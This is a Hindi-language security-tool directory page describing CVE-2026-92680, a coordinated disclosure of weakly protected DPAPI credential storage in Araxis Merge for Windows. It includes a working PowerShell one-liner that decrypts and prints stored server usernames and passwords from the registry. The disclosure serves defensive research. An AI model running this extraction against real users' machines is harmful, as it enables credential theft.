Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-92680 — Araxis Merge के DPAPI-संरक्षित सर्वर क्रेडेंशियल्स को डिक्रिप्ट करने वाला प्रूफ-ऑफ-कॉन्सेप्ट (CVE-2026-92680), जो Windows पर अपर्याप्त रूप से संरक्षित क्रेडेंशियल स्टोरेज को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/grepstrength/cve-2026-92680
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणक्रिप्टोग्राफी
GitHubgrepstrength/cve-2026-92680

CVE-2026-92680

Araxis Merge के DPAPI-संरक्षित सर्वर क्रेडेंशियल्स को डिक्रिप्ट करने वाला प्रूफ-ऑफ-कॉन्सेप्ट (CVE-2026-92680), जो Windows पर अपर्याप्त रूप से संरक्षित क्रेडेंशियल स्टोरेज को प्रदर्शित करता है।

रिपॉजिटरी देखें
1122घं 19मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-92680

Araxis Merge for Windows सर्वर क्रेडेंशियल्स को DPAPI के साथ संग्रहीत करता है, जिसमें pOptionalEntropy को NULL पर सेट किया जाता है। यह उसी उपयोगकर्ता संदर्भ में चलने वाले किसी भी कोड को उन्हें डिक्रिप्ट करने की अनुमति देता है।

पूरा विवरण: https://grepstrength.com/research/araxis-merge

CVECVE-2026-92680
CWECWE-522: अपर्याप्त रूप से संरक्षित क्रेडेंशियल्स
CVSS v3.15.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
विक्रेताAraxis Ltd.
प्रभावितAraxis Merge for Windows 2011.4074 से 2026.0 तक
में ठीक किया गया2026.1
विक्रेता सलाहMerge-SA-26-00
रिपोर्ट किया गया2026-08-18
प्रकट किया गया2026-XX-XX
रिपोर्टरgrepStrength

प्रूफ-ऑफ-कॉन्सेप्ट

यह HKCU\Software\Araxis\Merge\7.1\Passwords को डिक्रिप्ट और पार्स करेगा। इसे उसी Windows उपयोगकर्ता के रूप में चलाया जाना चाहिए जिसने मूल रूप से क्रेडेंशियल्स को संग्रहीत किया था।

root@kitploit:~
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize

नोट्स

सभी परीक्षण grepStength Security के स्वामित्व वाले सिस्टम्स पर केवल सिंथेटिक क्रेडेंशियल्स का उपयोग करके किए गए थे। यह Araxis Ltd. को रिपोर्ट किया गया था और समाधान उपलब्ध होने के बाद सार्वजनिक रूप से प्रकट किया गया था।

लाइसेंस

MIT

टूल डाउनलोड करें